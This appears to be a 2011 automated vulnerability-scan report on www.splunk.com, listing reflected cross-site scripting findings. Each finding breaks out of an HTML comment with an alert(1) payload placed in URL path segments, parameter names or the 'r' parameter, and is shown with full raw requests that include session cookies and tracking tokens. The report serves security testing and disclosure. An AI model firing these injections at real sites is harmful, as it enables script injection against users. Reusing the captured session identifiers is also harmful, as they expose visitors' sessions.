GET /view/careers/SP-CAAAAGG?267a6--><script>alert(1)</script>4fc3c5eb99e=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:17:05 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 21487d829f9688f63940c67c7815f4ff1296944226 Last-Modified: Sat, 05 Feb 2011 22:17:06 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24018
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 53711--><script>alert(1)</script>ecf5dc23f48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view53711--><script>alert(1)</script>ecf5dc23f48/cloud-and-managed-service-providers/SP-CAAACP7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 59262--><script>alert(1)</script>4bccf0ded2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers59262--><script>alert(1)</script>4bccf0ded2f/SP-CAAACP7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 1ba29--><script>alert(1)</script>10e9b5f0ca4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers/SP-CAAACP71ba29--><script>alert(1)</script>10e9b5f0ca4 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:40 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:40 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:40 GMT; path=/ ETag: ce3911b49673b010cfde7c3586f9d5461296944260 Last-Modified: Sat, 05 Feb 2011 22:17:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18475
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5271c--><script>alert(1)</script>2fee61c7c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/cloud-and-managed-service-providers/SP-CAAACP7?5271c--><script>alert(1)</script>2fee61c7c19=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:55 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 2ce4dc14d8530e6b8e2f7a6223742f331296944155 Last-Modified: Sat, 05 Feb 2011 22:15:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9b36f--><script>alert(1)</script>acfc5f06107 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view9b36f--><script>alert(1)</script>acfc5f06107/contact-us/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:25 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:25 GMT; path=/ ETag: c76acf6e98a1591eab32b904e496f6ce1296944126 Last-Modified: Sat, 05 Feb 2011 22:15:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload dd051--><script>alert(1)</script>8100fcbb878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-usdd051--><script>alert(1)</script>8100fcbb878/SP-CAAAAH7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:57 GMT; path=/ ETag: d1fc130c27cd507f005a3b287ca6ff3a1296944157 Last-Modified: Sat, 05 Feb 2011 22:15:57 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b7887--><script>alert(1)</script>0917a596735 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7b7887--><script>alert(1)</script>0917a596735 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.542. http://www.splunk.com/view/contact-us/SP-CAAAAH7 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/contact-us/SP-CAAAAH7
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 56278--><script>alert(1)</script>4d98f9bfc83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7?56278--><script>alert(1)</script>4d98f9bfc83=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:38 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 0ac66c375a4f849598c19dc25f4acd241296944080 Last-Modified: Sat, 05 Feb 2011 22:14:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the r request parameter is copied into an HTML comment. The payload d8695--><script>alert(1)</script>7007743a73 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/contact-us/SP-CAAAAH7?r=headerd8695--><script>alert(1)</script>7007743a73 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 93c1171c056a38de867c346a0f51a4301296944077 Last-Modified: Sat, 05 Feb 2011 22:14:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e3ec--><script>alert(1)</script>b7fae0382cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view9e3ec--><script>alert(1)</script>b7fae0382cf/customer-case-studies/SP-CAAABB2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 1d313--><script>alert(1)</script>44c48757134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/customer-case-studies1d313--><script>alert(1)</script>44c48757134/SP-CAAABB2 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
